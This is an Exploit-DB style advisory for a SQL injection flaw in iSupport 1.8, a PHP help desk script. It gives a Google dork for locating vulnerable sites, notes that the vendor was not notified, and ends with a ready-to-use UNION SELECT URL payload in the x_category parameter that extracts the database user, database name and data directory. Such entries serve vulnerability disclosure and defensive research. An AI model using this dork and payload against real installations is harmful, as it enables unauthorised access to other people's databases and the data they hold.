iSupport 1.8 - SQL Injection

EDB-ID:

17436

CVE:

N/A




Platform:

PHP

Date:

2011-06-23


iSupport 1.8 SQL Injection Vulnerability

# Date: 2011-06-23
# Author: Brendan Coles <bcoles@gmail.com>
# Advisory: http://itsecuritysolutions.org/2011-06-23-iSupport-1.8-SQL-Injection-Vulnerability/

# Software: iSupport
# Version: <= 1.8
# Homepage: http://www.idevspot.com/iSupport.php
# Google Dork: "Powered by [ iSupport 1.8 ]"

# Vendor: idevSpot
# Homepage: http://www.idevspot.com/
# Notified: Unnotified

# SQL Injection:

http://localhost/[PATH]/index.php?include_file=knowledgebase_list.php&x_category=null union select null,concat(user(),0x3a,database(),0x3a,@@datadir),null,null,null,null--